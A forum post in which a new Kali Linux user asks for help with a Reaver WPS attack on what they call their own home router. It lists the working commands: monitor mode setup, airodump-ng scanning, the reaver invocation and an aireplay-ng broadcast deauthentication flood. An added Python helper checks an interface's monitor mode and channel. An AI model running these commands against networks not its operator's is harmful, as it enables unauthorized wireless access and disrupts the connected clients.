I downloaded the latest Kali Linux last week and I am booting from a live DVD. My laptop is an HP Elitebook 850 with an Intel Wireless 7260 AC. I am new to Kali Linux, but I've been doing a lot of research, reading documentation, looking through forums, YouTube videos, etc. I am trying to see if I can hack my home wireless AP using Reaver; it's a Linksys EA2700 and it does have WPS turned on. I am about 10 ft away from it, so range is not a problem. I was able to get pretty far on my own and I got Reaver started, but it's stuck switching channels; I even left it running overnight. Also, I am not running this from a VM or anything, just booting my laptop from the Live DVD. After booting, here's what I type:
Code:
root@kali:~# iwconfig
eth0 no wireless extensions.
wlan0 IEEE 802.11abgn ESSID:off/any
Mode:Managed Access Point: Not-Associated Tx-Power=0 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Encryption key:off
Power Management:on
Then I stop the Network Manager and kill all the processes that can cause trouble.
Code:
root@kali:~# service network-manager stop
root@kali:~# airmon-ng check kill
Killing these processes:
PID Name
1328 wpa_supplicant
Now I put the interface in Monitor Mode.
Code:
root@kali:~# airmon-ng start wlan0
No interfering processes found
PHY Interface Driver Chipset
phy0 wlan0 iwlwifi Intel Corporation Wireless 7260 (rev 73)
(mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
(mac80211 station mode vif disabled for [phy0]wlan0)
Now I set the interface on channel 1 because my AP is on channel 1. I know this step seems a bit backwards because I haven't run Airodump yet to scan for the SSIDs, but having gone through these steps numerous times, I already know my AP is on channel 1. I did read in some of the forums that some people had better luck with setting the channel prior to turning on "monitor mode", but this is the only way I could get it to work.
Code:
root@kali:~# iwconfig wlan0mon channel 1
Now I run Airodump-ng to scan for the wireless networks around me.
Code:
root@kali:~# airodump-ng wlan0mon
CH 2 ][ Elapsed: 18 s ][ 2015-08-29 21:03
BSSID              PWR  Beacons  #Data, #/s  CH  MB   ENC   CIPHER AUTH  ESSID
20:AA:4B:92:AF:4B  -48       24      28    0   1  54e  WPA2  CCMP   PSK   SepiaFlamingo
02:AA:4B:92:AF:4C  -49       23       0    0   1  54e  OPN                SepiaFlamingo-guest
BSSID              STATION            PWR   Rate     Lost  Frames  Probe
20:AA:4B:92:AF:4B  60:02:B4:D1:C7:8E  -29   0 - 0e      8       3
20:AA:4B:92:AF:4B  00:21:6A:A7:C2:9E  -36   0e- 1e   1812      29
Press CTRL-C to exit Airodump. Optionally, I also ran the command wash (to show the wireless APs that have WPS enabled, but I didn't need this because it's my home AP, so I know it has WPS enabled).
Then I ran Reaver, and this is the part where it gets stuck. It just keeps cycling through the channels.
Code:
root@kali:~# reaver -i wlan0mon -b 20:AA:4B:92:AF:4B -S -N -a -w -vv
Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]> & DataHead & Soxrok2212
[+] Waiting for beacon from 20:AA:4B:92:AF:4B
[+] Switching wlan0mon to channel 1
[+] Switching wlan0mon to channel 2
[+] Switching wlan0mon to channel 1
I read somewhere that if you have trouble associating, you should try using Aireplay. I had two terminal windows open, one with Airodump and the other one with Aireplay. Here's my output from that, but Reaver still wouldn't work, even after using Aireplay.
Code:
root@kali:~# aireplay-ng -0 0 -a 20:AA:4B:92:AF:4B wlan0mon
21:31:12 Waiting for beacon frame (BSSID: 20:AA:4B:92:AF:4B) on channel 1
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
21:31:12 Sending DeAuth to broadcast -- BSSID: [20:AA:4B:92:AF:4B]
21:31:12 Sending DeAuth to broadcast -- BSSID: [20:AA:4B:92:AF:4B]
Anybody have any ideas how to fix this?
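The "Switching wlan0mon to channel 1 / channel 2" loop in the Reaver output above is the symptom of a monitor interface that is not actually sitting on the channel the tool expects, so no beacon is ever seen. The same failure mode hits any monitor-mode sensor (a wireless IDS node or a capture box investigating deauth floods like the one aireplay-ng generates). The helper below is an added example, not part of the post or of the aircrack-ng/Reaver projects: it parses iwconfig-style output and reports whether a given interface is in Monitor mode on the expected 2.4 GHz channel, using the standard channel-to-frequency mapping. The sample iwconfig text is constructed and modelled on the post's output.

```python
import re

# Constructed sample, modelled on the post's iwconfig output: wlan0mon is in
# Monitor mode but tuned to 2.417 GHz (channel 2), not channel 1.
SAMPLE_IWCONFIG = """\
eth0      no wireless extensions.

wlan0mon  IEEE 802.11  Mode:Monitor  Frequency:2.417 GHz  Tx-Power=20 dBm
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Power Management:off
"""


def channel_to_freq_ghz(channel: int) -> float:
    """Centre frequency (GHz) of a 2.4 GHz 802.11 channel (1-14)."""
    if 1 <= channel <= 13:
        return round(2.407 + 0.005 * channel, 3)  # 5 MHz spacing from 2.412
    if channel == 14:
        return 2.484                               # channel 14 is the exception
    raise ValueError(f"unsupported 2.4 GHz channel: {channel}")


def parse_iwconfig(text: str) -> dict:
    """Extract {iface: {'mode': str|None, 'freq_ghz': float|None}} from iwconfig output."""
    interfaces, current = {}, None
    for line in text.splitlines():
        # An interface block starts with the name in column 0 followed by
        # either the protocol string or "no wireless extensions".
        head = re.match(r"^(\S+)\s+(?:IEEE 802\.11|no wireless extensions)", line)
        if head:
            current = head.group(1)
            interfaces[current] = {"mode": None, "freq_ghz": None}
        if current is None:
            continue
        mode = re.search(r"Mode:(\S+)", line)
        if mode:
            interfaces[current]["mode"] = mode.group(1)
        freq = re.search(r"Frequency:([\d.]+) GHz", line)
        if freq:
            interfaces[current]["freq_ghz"] = float(freq.group(1))
    return interfaces


def check_monitor_channel(text: str, iface: str, channel: int) -> tuple:
    """Return (ok, reason): ok only if iface is in Monitor mode on `channel`."""
    info = parse_iwconfig(text).get(iface)
    if info is None:
        return False, f"{iface} not present in iwconfig output"
    if info["mode"] != "Monitor":
        return False, f"{iface} is in {info['mode']} mode, not Monitor"
    if info["freq_ghz"] is None:
        return False, f"{iface} reports no frequency (interface not tuned)"
    expected = channel_to_freq_ghz(channel)
    if abs(info["freq_ghz"] - expected) > 0.001:
        return False, f"{iface} is on {info['freq_ghz']} GHz, expected {expected} GHz (ch {channel})"
    return True, f"{iface} is in Monitor mode on channel {channel}"


if __name__ == "__main__":
    print(check_monitor_channel(SAMPLE_IWCONFIG, "wlan0mon", 1))
```

On a live system, feed it the real output with `check_monitor_channel(subprocess.check_output(["iwconfig"], text=True), "wlan0mon", 1)`; a second process hopping channels on the same phy (airodump-ng without a fixed channel, for instance) will show up here as a frequency that does not match.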